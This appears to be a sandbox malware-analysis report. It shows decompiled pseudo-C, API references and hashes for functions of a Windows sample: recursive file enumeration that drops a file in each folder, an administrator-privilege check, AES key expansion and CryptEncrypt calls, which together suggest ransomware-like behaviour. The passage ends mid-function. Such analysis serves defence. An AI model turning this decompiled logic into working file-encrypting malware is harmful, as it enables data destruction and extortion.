Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: $7@$$7@$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-2376705498
Opcode ID: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
Instruction ID: f2ae4c90db2c5b8a25dd032e9c4ad046e7fd1e3aad681ca681e37570fcd3149a
Opcode Fuzzy Hash: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
Instruction Fuzzy Hash: 84314F74A40308BFDB10CFA0DD45FAF77B8AB48700F108029F602BA2D0D7B99A50DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004066F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E004064A0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E00406640(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if((_v616.dwFileAttributes & 0x00000010) == 0) {
										_v16 =  *_t54;
										_t46 = E004063B0(_t63,  &_v616, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E004066F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x004066fc
0x004066ff
0x00406701
0x00406708
0x00406836
0x00406836
0x0040683c
0x0040671d
0x0040671d
0x00406735
0x00406738
0x0040673b
0x00406745
0x0040674b
0x0040674d
0x00406750
0x00406756
0x00406764
0x00406770
0x0040677c
0x00406782
0x00406784
0x00406796
0x0040679c
0x0040679e
0x004067a8
0x004067aa
0x004067b1
0x004067e2
0x004067e5
0x004067ea
0x004067ed
0x004067ef
0x004067f2
0x004067f5
0x004067f7
0x00406800
0x00406800
0x00406803
0x00406803
0x004067f9
0x004067fc
0x004067fe
0x00000000
0x00000000
0x004067fe
0x004067f7
0x004067b3
0x004067c7
0x004067cc
0x004067cc
0x0040680e
0x0040680e
0x00406810
0x00406810
0x0040679e
0x0040681d
0x00406823
0x00406823
0x0040682e
0x00000000
0x00406758
0x00406763
0x00406763
0x00406756

APIs

Part of subcall function 00406110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
Part of subcall function 00406110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C

Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
Part of subcall function 004064A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,?), ref: 00406524
Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
Part of subcall function 004064A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
Part of subcall function 004064A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
Part of subcall function 004064A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
Part of subcall function 004064A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
Part of subcall function 004064A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF

Part of subcall function 00406640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
Part of subcall function 00406640: wsprintfW.USER32 ref: 00406663
Part of subcall function 00406640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
Part of subcall function 00406640: GetLastError.KERNEL32(?,?), ref: 0040668C
Part of subcall function 00406640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
lstrcatW.KERNEL32(00000000,?), ref: 004067A8
lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
FindClose.KERNEL32(00003000,?,?), ref: 0040682E

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
Instruction ID: e664c09a6a9c308cb7d1e0fe319252d12530e52bee12665a8dc8c6cfb3a3f5dc
Opcode Fuzzy Hash: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
Instruction Fuzzy Hash: 60318F71A00219ABDF10AF65DD84AAE77B8EF44314B0584B7F806F7291DB389E50CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403A60() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t5 =  &_v8; // 0x404a63
					_t16 =  *_t15(0, _v12, _t5);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					_t10 =  &_v8; // 0x404a63
					return  *_t10;
				} else {
					return _t13;
				}
			}

0x00403a69
0x00403a89
0x00403a90
0x00403a98
0x00403aaf
0x00403ab5
0x00403abe
0x00403ac5
0x00403ac7
0x00403aca
0x00403ad0
0x00403ad6
0x00403a9d
0x00403a9d
0x00403a9d

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00403AA3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00403AAF
FreeSid.ADVAPI32(?), ref: 00403ACA

Strings

advapi32.dll, xrefs: 00403A9E
cJ@, xrefs: 00403AB5, 00403AD0, 00403AB8
CheckTokenMembership, xrefs: 00403AA9

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll$cJ@
API String ID: 3309497720-3398485638
Opcode ID: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
Instruction ID: 33a1519f93ae69caf91dd4e42da6a452692d52d9b4e3223079b77a4f0d81269a
Opcode Fuzzy Hash: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
Instruction Fuzzy Hash: D2F03C30A40209BBEB109BE0DD0EFADBB7CEB04705F1045A5FA04B62D1E6745A108B59

Uniqueness

Uniqueness Score: -1.00%

Function 00407EE0 Relevance: 2.9, Strings: 2, Instructions: 395
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00407EE0(signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t2 =  &_a8; // 0x40376f
				_t420 =  *_t2;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				_t20 =  &_a8; // 0x40376f
				 *( *_t20 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0x40aa40 + (_t421 >> 0x18) * 4) ^  *(0x40a640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t421 & 0x000000ff) * 4) ^  *0x409200;
				_t31 =  &_a8; // 0x40376f
				_v12 = _t284;
				 *( *_t31 + 0x20) = _t284;
				_t34 =  &_v16; // 0x40376f
				_t441 =  *_t34 ^ _t284;
				_t35 =  &_a8; // 0x40376f
				_v16 = _t441;
				 *( *_t35 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t39 =  &_a8; // 0x40376f
				_t442 =  *_t39;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t56 =  &_a8; // 0x40376f
				_t297 =  *_t56;
				_t544 = _t543 ^  *(0x40ae40 + (_t289 >> 0x18) * 4) ^  *(0x40aa40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0x40aa40 + (_t422 >> 0x18) * 4) ^  *(0x40a640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t422 & 0x000000ff) * 4) ^  *0x409204;
				_t70 =  &_a8; // 0x40376f
				_v12 = _t306;
				 *( *_t70 + 0x40) = _t306;
				_t73 =  &_v16; // 0x40376f
				_t458 =  *_t73 ^ _t306;
				_t74 =  &_a8; // 0x40376f
				_v16 = _t458;
				 *( *_t74 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t78 =  &_a8; // 0x40376f
				_t459 =  *_t78;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t95 =  &_a8; // 0x40376f
				_t319 =  *_t95;
				_t545 = _t544 ^  *(0x40ae40 + (_t311 >> 0x18) * 4) ^  *(0x40aa40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0x40aa40 + (_t423 >> 0x18) * 4) ^  *(0x40a640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t423 & 0x000000ff) * 4) ^  *0x409208;
				_t109 =  &_a8; // 0x40376f
				_v12 = _t328;
				 *( *_t109 + 0x60) = _t328;
				_t112 =  &_v16; // 0x40376f
				_t475 =  *_t112 ^ _t328;
				_t113 =  &_a8; // 0x40376f
				_v16 = _t475;
				 *( *_t113 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t117 =  &_a8; // 0x40376f
				_t476 =  *_t117;
				_v8 = _t331;
				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t134 =  &_a8; // 0x40376f
				_t341 =  *_t134;
				_t546 = _t545 ^  *(0x40ae40 + (_t333 >> 0x18) * 4) ^  *(0x40aa40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0x40aa40 + (_t424 >> 0x18) * 4) ^  *(0x40a640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t424 & 0x000000ff) * 4) ^  *0x40920c;
				_t148 =  &_a8; // 0x40376f
				_v12 = _t350;
				 *( *_t148 + 0x80) = _t350;
				_t151 =  &_v16; // 0x40376f
				_t492 =  *_t151 ^ _t350;
				_t152 =  &_a8; // 0x40376f
				_v16 = _t492;
				 *( *_t152 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t156 =  &_a8; // 0x40376f
				_t493 =  *_t156;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t173 =  &_a8; // 0x40376f
				_t363 =  *_t173;
				_t547 = _t546 ^  *(0x40ae40 + (_t355 >> 0x18) * 4) ^  *(0x40aa40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0x40aa40 + (_t425 >> 0x18) * 4) ^  *(0x40a640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t425 & 0x000000ff) * 4) ^  *0x409210;
				_t187 =  &_a8; // 0x40376f
				_v12 = _t372;
				 *( *_t187 + 0xa0) = _t372;
				_t190 =  &_v16; // 0x40376f
				_t509 =  *_t190 ^ _t372;
				_t191 =  &_a8; // 0x40376f
				_v16 = _t509;
				 *( *_t191 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t195 =  &_a8; // 0x40376f
				_t510 =  *_t195;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t212 =  &_a8; // 0x40376f
				_t385 =  *_t212;
				_t548 = _t547 ^  *(0x40ae40 + (_t377 >> 0x18) * 4) ^  *(0x40aa40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0x40aa40 + (_t426 >> 0x18) * 4) ^  *(0x40a640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t426 & 0x000000ff) * 4) ^  *0x409214;
				_t226 =  &_a8; // 0x40376f
				_v12 = _t394;
				 *( *_t226 + 0xc0) = _t394;
				_t229 =  &_v16; // 0x40376f
				_t526 =  *_t229 ^ _t394;
				_t230 =  &_a8; // 0x40376f
				_v16 = _t526;
				 *( *_t230 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t234 =  &_a8; // 0x40376f
				_t527 =  *_t234;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t251 =  &_a8; // 0x40376f
				_t407 =  *_t251;
				_t549 = _t548 ^  *(0x40ae40 + (_t399 >> 0x18) * 4) ^  *(0x40aa40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40a240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0x40aa40 + (_t427 >> 0x18) * 4) ^  *(0x40a640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x40ae40 + (_t427 & 0x000000ff) * 4) ^  *0x409218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t267 =  &_v16; // 0x40376f
				_t542 =  *_t267 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}

0x00407ee6
0x00407eea
0x00407eea
0x00407eee
0x00407ef0
0x00407ef3
0x00407ef5
0x00407ef8
0x00407efb
0x00407efe
0x00407f01
0x00407f04
0x00407f07
0x00407f0a
0x00407f0d
0x00407f10
0x00407f13
0x00407f16
0x00407f19
0x00407f1d
0x00407f20
0x00407f23
0x00407f28
0x00407f2e
0x00407f69
0x00407f6b
0x00407f6e
0x00407f71
0x00407f74
0x00407f77
0x00407f79
0x00407f7c
0x00407f7f
0x00407f85
0x00407f87
0x00407f87
0x00407f8a
0x00407f8d
0x00407f93
0x00407f96
0x00407f9b
0x00407fd2
0x00407fd2
0x00407fd5
0x00407fd7
0x00407fd9
0x00407fdb
0x00407fdd
0x00407fe0
0x00407fe3
0x00407fe6
0x00408026
0x00408028
0x0040802b
0x0040802e
0x00408031
0x00408034
0x00408036
0x00408039
0x0040803c
0x00408042
0x00408044
0x00408044
0x00408047
0x0040804a
0x00408050
0x00408053
0x00408058
0x0040808f
0x0040808f
0x00408092
0x00408094
0x00408096
0x00408098
0x0040809a
0x0040809f
0x004080a2
0x004080a5
0x004080e3
0x004080e5
0x004080e8
0x004080eb
0x004080ee
0x004080f1
0x004080f3
0x004080f6
0x004080f9
0x004080ff
0x00408101
0x00408101
0x00408104
0x00408107
0x0040810d
0x00408110
0x00408115
0x0040814c
0x0040814c
0x0040814f
0x00408151
0x00408153
0x00408155
0x00408157
0x0040815c
0x0040815f
0x00408162
0x004081a0
0x004081a2
0x004081a5
0x004081a8
0x004081ae
0x004081b1
0x004081b3
0x004081b6
0x004081b9
0x004081c2
0x004081c4
0x004081c4
0x004081c7
0x004081ca
0x004081d3
0x004081d6
0x004081de
0x00408215
0x00408215
0x00408218
0x0040821a
0x0040821c
0x0040821e
0x00408224
0x0040822a
0x00408230
0x00408232
0x00408275
0x00408277
0x0040827a
0x0040827d
0x00408283
0x00408286
0x00408288
0x0040828b
0x0040828e
0x00408297
0x00408299
0x00408299
0x0040829c
0x0040829f
0x004082a8
0x004082ab
0x004082b3
0x004082ea
0x004082ea
0x004082ed
0x004082ef
0x004082f1
0x004082f3
0x004082f5
0x004082fd
0x00408303
0x00408309
0x0040834a
0x0040834c
0x0040834f
0x00408352
0x00408358
0x0040835b
0x0040835d
0x00408360
0x00408363
0x0040836c
0x0040836e
0x0040836e
0x00408371
0x00408374
0x0040837d
0x00408380
0x00408388
0x004083bf
0x004083bf
0x004083c2
0x004083c4
0x004083c6
0x004083c8
0x004083ca
0x004083d2
0x004083d4
0x004083e5
0x004083eb
0x00408425
0x00408427
0x00408431
0x00408434
0x00408436
0x0040843f
0x00408443
0x00408449
0x00408451
0x00408457
0x00408463

Strings

o7@, xrefs: 00407F74, 00408031, 004080EE, 004081AE, 00408283, 00408358, 00408431
o7@, xrefs: 00407EEA, 00407F28, 00407F6B, 00407F79, 00407F87, 00407FD2, 00408028, 00408036, 00408044, 0040808F, 004080E5, 004080F3, 00408101, 0040814C, 004081A2, 004081B3, 004081C4, 00408215, 00408277, 00408288, 00408299, 004082EA, 0040834C, 0040835D, 0040836E, 004083BF

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID:
String ID: o7@$o7@
API String ID: 0-723442174
Opcode ID: da1e04724c4d4a96aecbab103dab413677a1afa7e8d63378d07e38b9d77e31b1
Instruction ID: 357c3c7235a915dd8e15f01338308de149f5b460bfde231befa3c1aa23e4610d
Opcode Fuzzy Hash: da1e04724c4d4a96aecbab103dab413677a1afa7e8d63378d07e38b9d77e31b1
Instruction Fuzzy Hash: 1E12E770A102149FCB08CF69D99096ABBF1FB4D300B4684BEE94ADB391CB35AA51CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00402000 Relevance: .5, Instructions: 491
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00402000(void* __eax, signed int __ebx, unsigned int __ecx, intOrPtr* __edi, signed int __esi) {
				signed char _t358;
				signed char _t366;
				signed char _t374;
				signed char _t382;
				signed char _t390;
				signed char _t398;
				signed char _t406;
				signed char _t414;
				signed char _t422;
				signed char _t434;
				signed char _t437;
				signed char _t439;
				signed char _t442;
				signed char _t444;
				signed char _t447;
				signed char _t449;
				signed char _t452;
				signed char _t454;
				signed char _t457;
				signed char _t459;
				signed char _t462;
				signed char _t464;
				signed char _t467;
				signed char _t469;
				signed char _t472;
				signed char _t474;
				signed char _t475;
				signed char _t477;
				signed char _t479;
				signed char _t480;
				signed char _t485;
				signed char _t493;
				signed char _t494;
				signed char _t502;
				signed char _t503;
				signed char _t511;
				signed char _t512;
				signed char _t520;
				signed char _t521;
				signed char _t529;
				signed char _t530;
				signed char _t538;
				signed char _t539;
				signed char _t547;
				signed char _t548;
				signed char _t556;
				signed char _t557;
				signed char _t565;
				signed char _t566;
				signed char _t594;
				signed int* _t700;
				signed int* _t701;
				signed int* _t713;
